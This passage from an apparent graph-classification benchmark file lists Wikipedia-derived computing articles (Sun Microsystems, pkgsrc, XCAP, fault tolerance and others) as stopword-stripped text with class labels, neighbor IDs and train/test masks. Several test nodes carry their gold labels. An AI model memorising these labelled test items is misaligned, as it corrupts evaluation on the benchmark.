sun open source contributions exceed combined total next five largest commercial contributors sun best known unix systems reputation system stability consistent design philosophy sun first workstation shipped unisoft v7 unix later 1982 sun began providing sunos customized 4.1bsd unix operating system workstations late 1980s tapped sun help develop next release branded unix 1988 announced would purchase 20 stake sun unix system v release 4 svr4 jointly developed sun sun used svr4 foundation solaris 2.x became successor sunos 4.1.x later retrospectively named solaris 1.x mid-1990s ensuing unix wars largely subsided sold unix interests relationship two companies significantly reduced 1992 sun also sold interactive unix operating system acquired bought interactive systems corporation eastman kodak company popular unix variant pc platform major competitor market leader sco unix sun focus interactive unix diminished favor solaris sparc x86 systems dropped product 2001 sun dropped solaris 2.x version numbering scheme solaris 2.6 release 1997 following version branded solaris 7 first 64-bit release intended new ultrasparc cpus based sparc v9 architecture within next four years successors solaris 8 solaris 9 released 2000 2002 respectively following several years difficult competition loss server market share competitors linux-based systems sun began include linux part strategy 2002 sun supported red hat enterprise linux suse linux enterprise server x64 systems companies canonical ltd. wind river systems montavista also supported versions linux sun sparc-based systems 2004 cultivated reputation one microsoft vocal antagonists sun entered joint relationship resolving various legal entanglements two companies receiving us 1.95 billion settlement payments sun supported microsoft windows x64 systems announced collaborative agreements microsoft including plans support virtualization environments 2005 company released solaris 10 new version included large number enhancements operating system well novel features previously unseen industry solaris 10 update releases continued next 8 years last release sun microsystems solaris 10 10/09 following updates released oracle new license agreement final release solaris 10 1/13 previously sun offered separate variant solaris called trusted solaris included augmented security features multilevel security least privilege access model solaris 10 included many capabilities trusted solaris time initial release solaris 10 11/06 included solaris trusted extensions give remaining capabilities needed make functional successor trusted solaris releasing solaris 10 source code opened cddl free software license developed open contributing opensolaris community sxce used svr4 .pkg packaging supported opensolaris releases used ips following acquisition sun oracle opensolaris continued develop open illumos illumos distributions oracle corporation continued develop opensolaris next solaris release changing back license proprietary released oracle solaris 11 november 2011 java platform developed sun james gosling early 1990s objective allowing programs function regardless device used sparking slogan write run anywhere wora objective entirely achieved prompting riposte write debug everywhere java regarded largely hardware- operating system-independent java initially promoted platform client-side applets running inside web browsers early examples java applications hotjava web browser hotjava views suite however since java successful server side internet platform consists three major parts java programming language java virtual machine jvm several java application programming interfaces apis design java platform controlled vendor user community java community process jcp java object-oriented programming language since introduction late 1995 became one world popular programming languages java programs compiled byte code executed jvm regardless environment java apis provide extensive set library routines apis evolved standard edition java se provides basic infrastructure gui functionality enterprise edition java ee aimed large software companies implementing enterprise-class application servers micro edition java used build software devices limited resources mobile devices november 13 2006 sun announced would licensing java implementation gnu general public license released java compiler jvm time february 2009 sun entered battle microsoft adobe systems promoted rival platforms build software applications internet javafx development platform music video applications builds java programming language 1999 sun acquired german software company star division office suite staroffice sun later released openoffice.org gnu lgpl sissl sun industry standards source license openoffice.org supported microsoft office file formats though perfectly available many platforms primarily linux microsoft windows mac os x solaris used open source community principal differences staroffice openoffice.org staroffice supported sun available either single-user retail box kit per-user blocks licensing enterprise included wider range fonts document templates commercial quality spellchecker staroffice also contained commercially licensed functions add-ons openoffice.org either replaced open-source free variants present packages native support opendocument format 2007 sun announced sun xvm virtualization datacenter automation product suite commodity hardware sun also acquired virtualbox 2008 earlier virtualization technologies sun like dynamic system domains dynamic reconfiguration specifically designed high-end sparc servers logical domains supports ultrasparc t1/t2/t2 plus server platforms sun marketed sun ops center provisioning software datacenter automation client side sun offered virtual desktop solutions desktop environments applications could hosted datacenter users accessing environments wide range client devices including microsoft windows pcs sun ray virtual display clients apple macintoshes pdas combination supported devices variety networks supported lan wan public internet virtual desktop products included sun ray server software sun secure global desktop sun virtual desktop infrastructure sun acquired mysql ab developer mysql database 2008 us 1 billion ceo jonathan schwartz mentioned blog optimizing performance mysql one priorities acquisition february 2008 sun began publish results mysql performance optimization work sun contributed postgresql project java platform sun contributed supported java db sun offered software products software development infrastructure services many developed house others came acquisitions including tarantella waveset technologies seebeyond vaau sun acquired many netscape non-browser software products part deal involving netscape merger aol software products initially offered iplanet brand sun-netscape alliance ended re-branded sun one sun open network environment sun java system sun middleware product branded java enterprise system jes marketed web application serving communication calendaring directory identity management service-oriented architecture sun open esb software suites available free charge systems running solaris red hat enterprise linux hp-ux windows support available optionally sun developed data center management software products included solaris cluster high availability software grid management package called sun grid engine firewall software sunscreen network equipment providers telecommunications customers sun developed sun netra high-availability suite sun produced compilers development tools sun studio brand building developing solaris linux applications sun entered software service saas market zembly social cloud-based computing platform project kenai open-source project hosting service sun sold storage systems complement system offerings also made several storage-related acquisitions june 2 2005 sun announced would purchase storage technology corporation storagetek us 4.1 billion cash 37.00 per share deal completed august 2005 2006 sun introduced sun storagetek 5800 system first application-aware programmable storage solution 2008 sun contributed source code storagetek 5800 system bsd license sun announced sun open storage platform 2008 built open source technologies late 2008 sun announced sun storage 7000 unified storage systems codenamed amber road transparent placement data systems solid-state drives ssd conventional hard drives managed zfs take advantage speed ssds economy conventional hard disks storage products included sun fire x4500 storage server sam-qfs filesystem storage management software sun marketed sun constellation system high-performance computing hpc even introduction sun constellation system 2007 sun products use many top500 systems supercomputing centers sun hpc clustertools product set message passing interface mpi libraries tools running parallel jobs solaris hpc clusters beginning version 7.0 sun switched implementation mpi open mpi donated engineering resources open mpi project sun participant openmp language committee sun studio compilers tools implemented openmp specification shared memory parallelization 2006 sun built tsubame supercomputer june 2008 fastest supercomputer asia sun built ranger texas advanced computing center tacc 2007 ranger peak performance 500 tflops 6th powerful supercomputer top500 list november 2008 sun announced opensolaris distribution integrated sun hpc products others notable sun employees included john gilmore whitfield diffie radia perlman marc tremblay sun early advocate unix-based networked computing promoting tcp/ip especially nfs reflected company motto network computer coined john gage james gosling led team developed java programming language jon bosak led creation xml specification w3c sun staff published articles company blog site staff encouraged use site blog aspect work personal life restrictions placed staff commercially confidential material jonathan i. schwartz one first ceos large companies regularly blog postings frequently quoted analyzed press 2005 sun microsystems one first fortune 500 companies instituted formal social media program sun sold oracle corporation 2009 5.6b sun staff asked share anecdotes experiences sun web site containing videos stories photographs 27 years sun made available september 2 2009 october sun announced second round thousands employees laid blamed partially delays approval merger transaction completed early 2010 january 2011 oracle agreed pay 46 million settle charges submitted false claims us federal government agencies paid kickbacks systems integrators february 2011 sun former menlo park california campus sold announced would become headquarters facebook sprawling facility built around enclosed courtyard nicknamed sun quentin september 1 2011 sun india legally became part oracle delayed due legal issues indian court",
    "neighbors": [
      2051,
      4107,
      8207,
      2073,
      26,
      4123,
      8227,
      36,
      4144,
      50,
      58,
      2106,
      4166,
      8266,
      2123,
      4172,
      10325,
      6230,
      10327,
      4189,
      2143,
      10340,
      2149,
      8295,
      8301,
      8303,
      125,
      6278,
      8327,
      4235,
      6284,
      6285,
      4239,
      4241,
      155,
      2208,
      8353,
      2215,
      6322,
      4285,
      6338,
      10436,
      6341,
      6353,
      4310,
      8410,
      219,
      2269,
      10465,
      2282,
      10478,
      242,
      8434,
      4358,
      2314,
      10526,
      10537,
      6445,
      10553,
      8508,
      6464,
      4426,
      4438,
      2395,
      8539,
      2397,
      6495,
      10595,
      10597,
      8553,
      366,
      6514,
      6518,
      381,
      398,
      10643,
      2452,
      8599,
      10650,
      414,
      426,
      10675,
      8628,
      442,
      10683,
      10684,
      6589,
      4544,
      8644,
      6601,
      10698,
      463,
      467,
      8668,
      8670,
      479,
      4581,
      488,
      8682,
      8683,
      6640,
      499,
      505,
      8700,
      8702,
      514,
      8725,
      10774,
      10789,
      8751,
      4663,
      4664,
      572,
      2620,
      6721,
      8772,
      4686,
      597,
      8792,
      603,
      2651,
      10843,
      2656,
      2658,
      4707,
      6754,
      631,
      8825,
      2687,
      6787,
      4741,
      6797,
      6803,
      2710,
      8854,
      4763,
      8863,
      8864,
      4771,
      8871,
      2731,
      10926,
      6834,
      10935,
      6854,
      6856,
      6860,
      4822,
      731,
      10981,
      10982,
      10984,
      2804,
      4857,
      2810,
      2811,
      4858,
      11013,
      6919,
      11019,
      6926,
      8976,
      8981,
      8994,
      6947,
      6948,
      2855,
      9010,
      9011,
      9012,
      823,
      2871,
      9016,
      11085,
      2895,
      11103,
      4960,
      866,
      878,
      7022,
      9078,
      7033,
      11129,
      9086,
      9090,
      2948,
      910,
      2967,
      7065,
      7072,
      11174,
      5031,
      9131,
      11184,
      9137,
      2995,
      5048,
      3006,
      9151,
      7104,
      9178,
      7146,
      7148,
      11246,
      7151,
      11255,
      11257,
      5115,
      7176,
      9231,
      5141,
      7204,
      1064,
      7218,
      9268,
      9278,
      9281,
      11332,
      11333,
      1097,
      5206,
      11353,
      1115,
      11361,
      11363,
      7269,
      7270,
      1128,
      5233,
      9333,
      7286,
      5240,
      5245,
      9343,
      7299,
      1158,
      7303,
      7307,
      7313,
      9363,
      5280,
      11426,
      5285,
      5292,
      5293,
      3247,
      9391,
      11440,
      5303,
      11447,
      11451,
      3260,
      3267,
      9422,
      3285,
      9441,
      1250,
      9444,
      5356,
      9452,
      11506,
      3323,
      5375,
      3328,
      5378,
      7432,
      1304,
      11553,
      11554,
      1316,
      1321,
      1332,
      1335,
      3389,
      7485,
      9540,
      7494,
      1363,
      11604,
      5471,
      1376,
      11626,
      9580,
      7535,
      1393,
      5492,
      11636,
      1398,
      1399,
      1400,
      5498,
      7547,
      5506,
      9602,
      5509,
      3462,
      11653,
      7561,
      1422,
      5523,
      7573,
      11670,
      9629,
      7592,
      7594,
      3502,
      1465,
      9657,
      5563,
      3517,
      3519,
      5567,
      3521,
      1480,
      3528,
      7642,
      9699,
      3558,
      3560,
      3561,
      3562,
      5609,
      5612,
      7666,
      5619,
      9730,
      1539,
      9731,
      3603,
      7702,
      5677,
      9774,
      9779,
      5686,
      1594,
      9791,
      1600,
      7750,
      1613,
      1614,
      7770,
      5723,
      1632,
      9831,
      5742,
      3705,
      1660,
      3709,
      3710,
      7806,
      3712,
      5767,
      9863,
      1675,
      7820,
      7822,
      3731,
      9888,
      1707,
      9916,
      9939,
      1755,
      5855,
      7907,
      9955,
      9962,
      5872,
      5873,
      3826,
      1780,
      9976,
      1786,
      1788,
      1795,
      7941,
      7944,
      1801,
      1807,
      1809,
      1818,
      3867,
      1839,
      7983,
      7991,
      5948,
      3904,
      10051,
      5956,
      3911,
      8007,
      10055,
      8012,
      3919,
      3920,
      10068,
      8023,
      3937,
      5987,
      1894,
      8048,
      6006,
      10104,
      3966,
      10122,
      8077,
      6033,
      6039,
      3994,
      1952,
      6049,
      8100,
      8107,
      6061,
      6067,
      4021,
      6071,
      6074,
      10170,
      10193,
      8147,
      6102,
      8152,
      10200,
      6107,
      6120,
      10224,
      6129,
      8179,
      10236,
      6142,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 9666,
    "label": 9,
    "text": "ColdSpring_Framework:coldspring framework coldspring web application framework coldfusion application programming language based java spring framework originally created dave ross chris scott framework provides dependency injection inversion control aspect-oriented programming design pattern capabilities effort make configuration dependencies coldfusion components cfcs easier manage noted strength coldspring ability provide complementary services applications frameworks coldspring deeply embedded within core model-glue framework since model-glue 2.0 also fusebox since 5.0 ships coldspring-specific lexicon reverse coldspring ships connection points model-glue mach-ii unit testing framework cfcunit coldspring historically long development release cycle compared coldfusion frameworks coldspring first mentioned dave ross released pre-alpha version february 9 2005 interest found quickly within coldfusion community support group formed around software later 2005 coldspring framework web site eventually release candidate released june 2 2006 coldspring 1.0 finally released three days cfunited dave ross scheduled speak topic 1.2 release included changes make working beans especially using xml bean factory much easier including creating bean aliases including bean configuration files creating collections within configuration file fixes",
    "neighbors": [
      1920,
      3462,
      8582,
      3469,
      2062,
      9614,
      2576,
      9618,
      148,
      1812,
      4507,
      6941,
      9245,
      10526,
      4512,
      8739,
      3876,
      4777,
      5165,
      4529,
      7987,
      692,
      8883,
      7862,
      3895,
      5048,
      9144,
      6074,
      190,
      5314,
      8644,
      1353,
      595,
      84,
      4056,
      6493,
      102,
      8554,
      8691,
      3705,
      11259
    ],
    "mask": "None"
  },
  {
    "node_id": 9667,
    "label": 2,
    "text": "LinuxFund:linuxfund linux fund organization raising money making donations free open source software foss projects since 1999 irs 501 c 3 status granted linux fund august 2007 allowing direct solicitations individuals charitable foundations prior receiving 501 c 3 letter principal funding source affinity credit card program credit cards bearing graphic tux linux penguin visa cards currently offered usa us bank linux fund founded peak 1999 high-tech boom affinity credit card mbna gave away first t-shirt summer 1999 linuxworld expo summer 2000 grants developers program begun years surviving dot-com bubble organization fell stagnation june 2005 investigating reports website newsforge jay lyman revealed organization actively distributing funds foss projects lyman reported funds mbna cards continued flow organization 126,155.29 growing bank then-executive-director jerritt collord told lyman gotten burned largely one-man organization sitting idle lackluster success open oregon technology center fall 2005 founding directors met decided clean organizational backlog start funding foss projects june 2005 bank america bought mbna april 2007 bank america gave linux fund notice affinity mastercard program would discontinued effective june 30 2007 july 1 2007 us bank released linux fund visa card august 2007 irs granted linux fund 501 c 3 status may 2009 open hardware foundation joined linux fund prior cancellation bank america linux fund supporting 10 different projects including debian wikimedia foundation blender software free geek freenode openssh typical grant 500/month renewable 6 12-month commitments linux fund also given lump-sum donations order 1,000– 5,000 project funding frozen briefly bank america canceled usa mastercard agreement funding since resumed new us bank visa card current projects include mix open-source software hardware projects including gnash inkscape lives open graphics project 2005 debian project leader branden robinson thanked linux fund continued support debian project noted benefit long-term grants foss projects funding ... enable us bit forward planning debian runs entirely donations ... steady predictable flow revenue help us feel comfortable long-range resource planning linux fund deserves thanks credit pioneering new funding models free software community scott rainey michael dexter iris oren benjamin cox candace ramcharan dan carrere",
    "neighbors": [
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      6213,
      8268,
      5222,
      10856,
      4734,
      7812,
      4238,
      10382,
      2195,
      2711,
      9882,
      1694,
      2723,
      10933,
      5815,
      5822,
      1736,
      2762,
      8909,
      8410,
      10971,
      8928,
      1761,
      2278,
      233,
      10482,
      2294,
      8439,
      2809,
      4360,
      792,
      10016,
      295,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      9579,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      10631,
      5514,
      4493,
      9621,
      8602,
      11678,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      8186,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 9668,
    "label": 3,
    "text": "Direction_flag:direction flag direction flag flag controls left-to-right right-to-left direction string processing stored flags register x86-compatible cpus bit number 10 flag used determine direction 'forward 'backward several bytes data copied one place memory another direction important mainly original data position memory target data position overlap",
    "neighbors": [
      6596,
      9158,
      585,
      9739,
      9996,
      5040,
      5234,
      499,
      372,
      3699,
      9331,
      9911,
      7421,
      602,
      1915,
      477
    ],
    "mask": "None"
  },
  {
    "node_id": 9669,
    "label": 3,
    "text": "Darwin_Core:darwin core darwin core often abbreviated dwc extension dublin core biodiversity informatics meant provide stable standard reference sharing information biological diversity terms described standard part larger set vocabularies technical specifications development maintained biodiversity information standards tdwg formerly known taxonomic databases working group tdwg darwin core body standards includes glossary terms contexts might called properties elements fields columns attributes concepts intended facilitate sharing information biological diversity providing reference definitions examples commentaries darwin core primarily based taxa occurrence nature documented observations specimens samples related information included standard documents describing terms managed set terms extended new purposes terms used simple darwin core specification one particular way use terms share data taxa occurrences simply-structured way likely meant someone suggest formatting data according darwin core term definition commentaries meant promote consistent use terms across applications disciplines evolving commentaries discuss refine expand translate definitions examples referred links comments attribute term approach documentation allows standard adapt new purposes without disrupting existing applications meant clear separation terms defined standard applications make use example though data types constraints provided term definitions recommendations made restrict values appropriate practice darwin core decouples definition semantics individual terms application terms different technologies xml rdf simple csv text files darwin core provides separate guidelines encode terms xml text files darwin core originally created z39.50 profile z39.50 biology implementers group zbig supported funding usa national science foundation award name darwin core first coined allen allison first meeting zbig held university kansas 1998 commenting profile conceptual similarity dublin core darwin core profile later expressed xml schema document use distributed generic information retrieval digir protocol tdwg task group created revise darwin core ratified metadata standard officially released 9 october 2009 though ratified tdwg/biodiversity information standards standard since darwin core numerous previous versions production usage published standard contains history details versions leading current standard",
    "neighbors": [
      6955,
      140,
      3052,
      1752,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 9670,
    "label": 5,
    "text": "XML_Configuration_Access_Protocol:xml configuration access protocol xml configuration access protocol xcap application layer protocol allows client read write modify application configuration data stored xml format server xcap maps xml document sub-trees element attributes http uris components directly accessed clients using http protocol xcap server used xcap clients store data like buddy lists presence policy combination sip presence server supports publish subscribe notify methods provide complete sip simple server solution following operations supported via xcap protocol client-server interaction operations executed following items xcap addressing mechanism based xpath provides ability navigate around xml tree following applications provided xcap using specific auid application unique id xcap protocol based following ietf standards rfc4825 rfc4826 rfc4827 rfc5025 application org.openmobilealliance.pres-rules standard added",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      479,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6651,
      10748
    ],
    "mask": "Test"
  },
  {
    "node_id": 9671,
    "label": 2,
    "text": "Pkgsrc:pkgsrc pkgsrc package source package management system unix-like operating systems forked freebsd ports collection 1997 primary package management system netbsd since evolved independently 1999 support solaris added followed support operating systems pkgsrc currently contains 22,000 packages includes popular open-source software native package manager netbsd smartos minix 3 portable across 23 different operating systems including aix various bsd derivatives hp-ux irix linux macos solaris qnx multiple ways install programs using pkgsrc pkgsrc bootstrap contains traditional ports collection utilizes series makefiles compile software source another method install pre-built binary packages via pkg_add pkg_delete tools high-level utility named pkgin also exists designed automate installation removal update binary packages manner similar debian advanced packaging tool several vendors including joyent subsidiary samsung provide binary packages popular operating systems including macos linux october 3 1997 netbsd developers alistair crooks hubert feyrer created pkgsrc based freebsd ports system intended support netbsd packages collection officially released part netbsd 1.3 january 4 1998 dragonfly bsd used pkgsrc official package system version 1.4 2006 3.4 2013 2017-09-12 commit message policy accommodates dvcs established project netbsd foundation provides official pre-built binary packages multiple combinations netbsd pkgsrc releases occasionally certain operating systems well 2018 several vendors provide pre-built binary packages several platforms",
    "neighbors": [
      10760,
      7181,
      8213,
      6680,
      9245,
      9762,
      5155,
      5670,
      7722,
      5677,
      1071,
      1080,
      3131,
      3649,
      10817,
      8778,
      3667,
      6227,
      9324,
      8816,
      1138,
      2168,
      7293,
      9343,
      1668,
      6797,
      10900,
      10394,
      8347,
      4775,
      6828,
      11442,
      5819,
      6333,
      190,
      8909,
      4302,
      2259,
      5335,
      7383,
      6361,
      8413,
      7907,
      741,
      231,
      2281,
      7920,
      11506,
      6393,
      11525,
      1286,
      2310,
      1801,
      7435,
      7947,
      9487,
      8976,
      10000,
      274,
      788,
      1813,
      5397,
      1304,
      8476,
      8998,
      4398,
      6446,
      7983,
      1842,
      823,
      2872,
      3918,
      1361,
      4951,
      9564,
      2401,
      1379,
      9063,
      8554,
      2415,
      10096,
      5506,
      8068,
      3462,
      8582,
      2955,
      2448,
      10149,
      11184,
      11698,
      6583,
      10172,
      9151,
      8644,
      1993,
      5578,
      5067,
      5070,
      463,
      2010,
      4571,
      7140,
      6119,
      5096,
      5612,
      2545,
      1522,
      3573,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9672,
    "label": 1,
    "text": "Catalog_server:catalog server catalog server provides single point access allows users centrally search information across distributed network words indexes databases files information across large network allows keywords boolean searches need provide comprehensive searching service intranet extranet even internet catalog server standard solution",
    "neighbors": [
      245
    ],
    "mask": "Test"
  },
  {
    "node_id": 9673,
    "label": 3,
    "text": "Last_Armageddon:last armageddon described antithesis dragon quest fantasy series introductory story deals life organisms humans animals wiped mysterious force music game considered representative hiroharu hayama early works composer japanese video games late 1980s early 1990s hayama often used music make games feel spooky dark game sequel armageddon gaiden released sega cd 1994 working designs planned release game north america side story armageddon 1995 localization cancelled due demise sega cd system humans breathed toxin-filled air earth surface became one earth kept dissolving history humanity ended dominion planet returned demons mutant creatures depend oxygen survive therefore able breathe air use land meanwhile army robots wage world war iv demons order conquer known makai demon world robots came planet wave energy created explosion turned world wasteland much later game concurrent themes including adolf hitler war creating perfect race people destruction humanity year 1999 revealed player inside one robot main bases demons gain dominion humans old planet robots impose millennium logic dictatorial force throughout makai playing robots option open player therefore player must take advantage mutant army crush robot invaders game builds theme impending world domination machines popularized famously terminator series gameplay similar final fantasy featuring turn-based fights viewed third-person perspective demon soldiers enemies may cast magic spells physical attacks magic attacks ability inflict poison damage player creatures creature poisoned player must spare creature magic points order cure affected monster spell letting creature remain poisoned certain amount time eventually lead death game plays like role-playing video game graves fallen demons home base remind player situation game player first starts game go right experienced monsters lie stadium-shaped power station southeastern corner map take foursome level 5-10 characters order defeat robots inside dome characters advance level monster images change slightly time characters advance levels 17 34 maximum possible levels monsters look completely slimy fusion cells get ugly two groups four monsters player controls daytime group nighttime group becomes night game daytime group becomes inactive nighttime group takes however hp/mp replenishment group becomes inactive next morning night phase although monsters use healing spells cure conditions like poisoning known way cure hp game via items spread throughout dungeons game using magic spell nintendo family computer version lacks monster encyclopedia exists versions game none background music game resemble pc engine fm towns version likely famicom version developed different company also four different people worked soundtrack two versions existed fm towns version large memory version normal levels animation small memory version slightly reduced levels animation fm towns version also comes series three cd-roms requires 1 megabyte ram low memory version 2 megabytes ram high memory version one character equipped powerful sword azotto person pre-determined game 3.5 floppy disk needed save game purchased separately game pc engine version 3d maps shown flat two-dimensional dungeons goblins orcs equipped swords unlike versions transition time daytime night time characters eliminated pc engine version leading immediate swap characters",
    "neighbors": [
      5436,
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 9674,
    "label": 3,
    "text": "Knight_Orc:knight orc knight orc standard text adventure game limited graphics platforms level 9 released 1987 comes short novella peter mcbride sign orc explaining background story night heavy drinking friends grindleguts orc awakes find strapped horse joust human knight friends nowhere seen must somehow escape predicament get even grindleguts must survive world hostile humans seeking revenge tormentors first chapter game switches science fiction setting grindleguts revealed malfunctioning non-player character futuristic massively multiplayer online role-playing game using power transitioning fantasy reality convinces several bots join escapes simulated reality facility sinclair user say knight orc ordinary adventure oh multi-user adventure ... players simulated one nice touch little bits added end descriptions tell players 'somewhere male voice cries anyone got spare treasure ... location descriptions exquisite make absence graphics ... humour worked text like something douglas adams novel quick-fire enjoyable never droll ... high spot game interactive characters ... characters goal complete one thing common hate orcs ... technically pawn may superior plot enjoyment atmosphere knight orc wins hands computer gaming world stated graphics waste disk space puzzles uneven however excellent parser virtues resulted average game computer magazine said disappointing atari magazine page 6 said excellent value money atari 8-bit version",
    "neighbors": [
      9006,
      10931,
      9166,
      8542
    ],
    "mask": "Test"
  },
  {
    "node_id": 9675,
    "label": 7,
    "text": "Carrier_cloud:carrier cloud cloud computing carrier cloud class cloud integrates wide area networks wan attributes communications service providers ’ carrier grade networks enable deployment highly demanding applications cloud contrast classic cloud computing focusses data center address network connecting data centers cloud users may result unpredictable response times security issues business critical data transferred internet advent virtualization technology cost effective computing hardware well ubiquitous internet connectivity enabled first wave cloud services starting first years 21st century many businesses organizations hesitated move demanding applications on-premises dedicated hardware private public clouds response communications service providers started 2010/2011 time frame develop carrier clouds address perceived weaknesses existing cloud services weaknesses cited vary often include performance availability security service level agreements slas enable deployment time-sensitive business critical applications cloud carrier cloud designed match even exceed characteristics on-premises deployments therefore carrier cloud characterized following items carrier clouds encompass data centers different network tiers wide area networks connect multiple data centers well cloud users links data centers used instance failover overflow backup geographic diversity carrier clouds set public private hybrid clouds carrier cloud federates cloud entities using single management system orchestrate manage monitor data center network resources single system",
    "neighbors": [
      10368,
      4194,
      10020,
      5321,
      4429,
      5749,
      8471,
      7865
    ],
    "mask": "None"
  },
  {
    "node_id": 9676,
    "label": 4,
    "text": "Theta_Networks:theta networks theta networks new jersey based telecommunication solutions company founded 2005 company develops deep packet inspection-based software used monitoring optimization subscriber management security mobile networks theta networks major supplier nokia siemens networks ericsson motorola orange china mobile assisted china mobile olympic games recently theta networks also working china mobile monitoring support new td-scdma networks theta solutions reassembles finds relationships subscriber application sessions open systems interconnection layer 7 using deep packet inspection cross packet inspection cross session inspection technology applied mobile use wap mms sms http dns streaming technology theta networks also offers virusguardmax dpi-based network security product company offices new jersey south america china theta networks company works france partner also recently established partnerships australia russia",
    "neighbors": [
      5875,
      10417,
      939,
      2887
    ],
    "mask": "Train"
  },
  {
    "node_id": 9677,
    "label": 4,
    "text": "Fault_tolerance:fault tolerance fault tolerance property enables system continue operating properly event failure one faults within components operating quality decreases decrease proportional severity failure compared naively designed system even small failure cause total breakdown fault tolerance particularly sought high-availability life-critical systems ability maintaining functionality portions system break referred graceful degradation fault-tolerant design enables system continue intended operation possibly reduced level rather failing completely part system fails term commonly used describe computer systems designed continue less fully operational perhaps reduction throughput increase response time event partial failure system whole stopped due problems either hardware software example another field motor vehicle designed continue drivable one tires punctured structure able retain integrity presence damage due causes fatigue corrosion manufacturing flaws impact within scope individual system fault tolerance achieved anticipating exceptional conditions building system cope general aiming self-stabilization system converges towards error-free state however consequences system failure catastrophic cost making sufficiently reliable high better solution may use form duplication case consequence system failure catastrophic system must able use reversion fall back safe mode similar roll-back recovery human action humans present loop highly fault-tolerant system might continue level performance even though one components failed example building backup electrical generator provide voltage wall outlets even grid power fails system designed fail safe fail-secure fail gracefully whether functions reduced level fails completely way protects people property data injury damage intrusion disclosure computers program might fail-safe executing graceful exit opposed uncontrolled crash order prevent data corruption experiencing error similar distinction made failing well failing badly fail-deadly opposite strategy used weapon systems designed kill injure targets even part system damaged destroyed system designed experience graceful degradation fail soft used computing similar fail safe operates reduced level performance component failures example building may operate lighting reduced levels elevators reduced speeds grid power fails rather either trapping people dark completely continuing operate full power computing example graceful degradation insufficient network bandwidth available stream online video lower-resolution version might streamed place high-resolution version progressive enhancement example computing web pages available basic functional format older small-screen limited-capability web browsers enhanced version browsers capable handling additional technologies larger display available fault-tolerant computer systems programs considered robust designed continue operation despite error exception invalid input instead crashing completely software brittleness opposite robustness resilient networks continue transmit data despite failure links nodes resilient buildings infrastructure likewise expected prevent complete failure situations like earthquakes floods collisions system high failure transparency alert users component failure occurred even continues operate full performance failure repaired imminent complete failure anticipated likewise fail-fast component designed report first point failure rather allow downstream components fail generate reports allows easier diagnosis underlying problem may prevent improper operation broken state single fault condition situation one means protection hazard defective single fault condition results unavoidably another single fault condition two failures considered one single fault condition source offers following example redundancy provision functional capabilities would unnecessary fault-free environment consist backup components automatically kick one component fails example large cargo trucks lose tire without major consequences many tires one tire critical exception front tires used steer generally carry less load total four 16 less likely fail idea incorporating redundancy order improve reliability system pioneered john von neumann 1950s two kinds redundancy possible space redundancy time redundancy space redundancy provides additional components functions data items unnecessary fault-free operation space redundancy classified hardware software information redundancy depending type redundant resources added system time redundancy computation data transmission repeated result compared stored copy previous result current terminology kind testing referred 'in service fault tolerance testing isftt short providing fault-tolerant design every component normally option associated redundancy brings number penalties increase weight size power consumption cost well time design verify test therefore number choices examined determine components fault tolerant example component passes tests car occupant restraint system normally think primary occupant restraint system gravity vehicle rolls undergoes severe g-forces primary method occupant restraint may fail restraining occupants accident absolutely critical safety pass first test accidents causing occupant ejection quite common seat belts pass second test cost redundant restraint method like seat belts quite low economically terms weight space pass third test therefore adding seat belts vehicles excellent idea supplemental restraint systems airbags expensive pass test smaller margin another excellent long-term example principle put practice braking system whilst actual brake mechanisms critical particularly prone sudden rather progressive failure case necessarily duplicated allow even balanced application brake force wheels would also prohibitively costly double-up main components would add considerable weight however similarly critical systems actuating brakes driver control inherently less robust generally using cable rust stretch jam snap hydraulic fluid leak boil develop bubbles absorb water thus lose effectiveness thus modern cars footbrake hydraulic brake circuit diagonally divided give two smaller points failure loss either reducing brake power 50 causing much dangerous brakeforce imbalance straight front-back left-right split hydraulic circuit fail completely relatively rare occurrence failsafe form cable-actuated parking brake operates otherwise relatively weak rear brakes still bring vehicle safe halt conjunction transmission/engine braking long demands line normal traffic flow cumulatively unlikely combination total foot brake failure need harsh braking emergency likely result collision still one lower speed would otherwise case comparison foot pedal activated service brake parking brake less critical item unless used one-time backup footbrake cause immediate danger found nonfunctional moment application therefore redundancy built per se typically uses cheaper lighter less hardwearing cable actuation system suffice happens hill use footbrake momentarily hold vehicle still driving find flat piece road stop alternatively shallow gradients transmission shifted park reverse first gear transmission lock engine compression used hold stationary need include sophistication first bring halt motorcycles similar level fail-safety provided simpler methods firstly front rear brake systems entirely separate regardless method activation cable rod hydraulic allowing one fail entirely whilst leaving unaffected secondly rear brake relatively strong compared automotive cousin even powerful disc sports models even though usual intent front system provide vast majority braking force overall vehicle weight central rear tyre generally larger grippier rider lean back put weight therefore allowing brake force applied wheel locks cheaper slower utility-class machines even front wheel use hydraulic disc extra brake force easier packaging rear usually primitive somewhat inefficient exceptionally robust rod-actuated drum thanks ease connecting footpedal wheel way importantly near impossibility catastrophic failure even rest machine like lot low-priced bikes first years use point collapse neglected maintenance basic characteristics fault tolerance require addition fault-tolerant systems characterized terms planned service outages unplanned service outages usually measured application level hardware level figure merit called availability expressed percentage example five nines system would statistically provide 99.999 availability fault-tolerant systems typically based concept redundancy spare components address first fundamental characteristic fault tolerance three ways implementations raid redundant array independent disks except raid 0 examples fault-tolerant storage device uses data redundancy lockstep fault-tolerant machine uses replicated elements operating parallel time replications element state inputs provided replication outputs expected outputs replications compared using voting circuit machine two replications element termed dual modular redundant dmr voting circuit detect mismatch recovery relies methods machine three replications element termed triple modular redundant tmr voting circuit determine replication error two-to-one vote observed case voting circuit output correct result discard erroneous version internal state erroneous replication assumed different two voting circuit switch dmr mode model applied larger number replications lockstep fault-tolerant machines easily made fully synchronous gate replication making state transition edge clock 